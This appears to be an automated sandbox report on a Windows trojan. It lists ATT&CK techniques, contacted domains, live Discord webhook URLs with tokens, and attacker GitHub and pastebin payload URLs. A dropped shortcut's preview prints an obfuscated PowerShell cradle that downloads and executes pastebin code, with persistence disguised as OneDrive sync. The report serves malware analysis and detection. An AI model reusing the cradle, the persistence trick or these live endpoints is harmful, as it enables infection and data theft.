Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF32250 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF68EF32250

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory121
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS131
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Application Window Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534108 Sample: OSLdZanXNc.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 88 44 pastebin.com 2->44 46 raw.githubusercontent.com 2->46 48 discord.com 2->48 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Sigma detected: PowerShell Download and Execution Cradles 2->66 70 2 other signatures 2->70 9 OSLdZanXNc.exe 1 2->9         started        11 forfiles.exe 1 2->11         started        14 forfiles.exe 1 2->14         started        signatures3 68 Connects to a pastebin service (likely for C&C) 44->68 process4 signatures5 16 powershell.exe 12 9->16         started        19 conhost.exe 9->19         started        72 Suspicious powershell command line found 11->72 21 powershell.exe 7 11->21         started        23 conhost.exe 1 11->23         started        25 powershell.exe 14->25         started        27 conhost.exe 1 14->27         started        process6 signatures7 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->56 58 Suspicious powershell command line found 16->58 60 Powershell creates an autostart link 16->60 29 powershell.exe 15 20 16->29         started        34 powershell.exe 13 21->34         started        36 powershell.exe 25->36         started        process8 dnsIp9 50 raw.githubusercontent.com 185.199.108.133, 443, 49757, 49763 FASTLYUS Netherlands 29->50 52 discord.com 162.159.137.232, 443, 49868, 49943 CLOUDFLARENETUS United States 29->52 42 C:\ProgramData\...\BeginSync.lnk, MS 29->42 dropped 74 Tries to open files direct via NTFS file id 29->74 38 conhost.exe 29->38         started        40 attrib.exe 1 29->40         started        54 pastebin.com 104.20.3.235, 443, 49854, 49856 CLOUDFLARENETUS United States 34->54 file10 signatures11 process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
OSLdZanXNc.exe0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://go.micro0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.137.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.108.133
    		truetrue
      		unknown
      pastebin.com
      		104.20.3.235
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
          		unknown
          https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
              		unknown
              http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txtfalse
                		unknown
                http://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://pastebin.com/raw/sA04Mwk2false
                    		unknown
                    https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                      		unknown
                      https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txtfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://discord.compowershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386F2000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000B.00000002.3233396001.000001E8387EB000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://raw.githubusercontent.compowershell.exe, 0000000B.00000002.3233396001.000001E8386FA000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://go.micropowershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  http://raw.githubusercontent.compowershell.exe, 0000000B.00000002.3233396001.000001E838753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E838784000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://discord.compowershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E837CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://pastebin.compowershell.exe, 0000000B.00000002.3233396001.000001E8386D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://pastebin.compowershell.exe, 0000000B.00000002.3233396001.000001E8386C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.20.3.235
                                          		pastebin.comUnited States
                                          		13335CLOUDFLARENETUStrue
                                          162.159.137.232
                                          		discord.comUnited States
                                          		13335CLOUDFLARENETUStrue
                                          185.199.108.133
                                          		raw.githubusercontent.comNetherlands
                                          		54113FASTLYUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1534108
                                          Start date and time:2024-10-15 16:00:00 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 13s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name:Run with higher sleep bypass
                                          Number of analysed new started processes analysed:19
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:OSLdZanXNc.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
                                          Detection:MAL
                                          Classification:mal88.troj.evad.winEXE@21/16@3/3
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 74%
                                          • Number of executed functions: 15
                                          • Number of non-executed functions: 17
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 7328 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • VT rate limit hit for: OSLdZanXNc.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          15:01:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                          15:01:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          104.20.3.235Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          sostener.vbsGet hashmaliciousNjratBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          sostener.vbsGet hashmaliciousRemcosBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          162.159.137.232BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                  WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                    main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                                                      Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                        https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                          http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                            SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              discord.comxK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 162.159.138.232
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              pastebin.comHQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 172.67.19.24
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 172.67.19.24
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              raw.githubusercontent.comxK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.110.133
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 185.199.111.133
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.108.133
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.110.133
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.108.133

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUS5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                              • 162.159.128.233
                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 104.17.112.233
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 172.67.19.24
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 162.159.138.232
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.18.111.161
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
                                                              CLOUDFLARENETUS5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                              • 162.159.128.233
                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 104.17.112.233
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 172.67.19.24
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 162.159.138.232
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.18.111.161
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
                                                              FASTLYUS5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.110.133
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 185.199.111.133
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.108.133
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.110.133

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0e5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 185.199.108.133
                                                              • 162.159.137.232

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                              Category:dropped
                                                              Size (bytes):1728
                                                              Entropy (8bit):4.527272298423835
                                                              Encrypted:false
                                                              SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                              MD5:724AA21828AD912CB466E3B0A79F478B
                                                              SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                              SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                              SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                              Malicious:true
                                                              Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):11608
                                                              Entropy (8bit):4.890472898059848
                                                              Encrypted:false
                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                              Malicious:false
                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1600
                                                              Entropy (8bit):5.685427275916648
                                                              Encrypted:false
                                                              SSDEEP:48:zSU4YymI4RIoUeCa+m9qr9tK8NfxBUICmL6o882:2HYvIIfLz9qr2KfnUjmLe
                                                              MD5:AF834D62657936BD004DFACF2B4B0E33
                                                              SHA1:EBCDAC08F40E6C3284CF852F4EB161AA02DF4C4A
                                                              SHA-256:012B750782ECD04C36E925F14B3C461E752078763062E00828C7ED1F295FCBF8
                                                              SHA-512:5413D3996ADC421B62AD54613092D87F440C27A2596E815BC14C7AAFF92B27F6A392393442154494BCF23B7597E8E552F5F16553039AB21736A9A7D67EAB3B2C
                                                              Malicious:false
                                                              Preview:@...e...........Q...................R.X.`............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vgrz2ns.fqi.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jjwau1g.utv.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bersny31.bxb.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
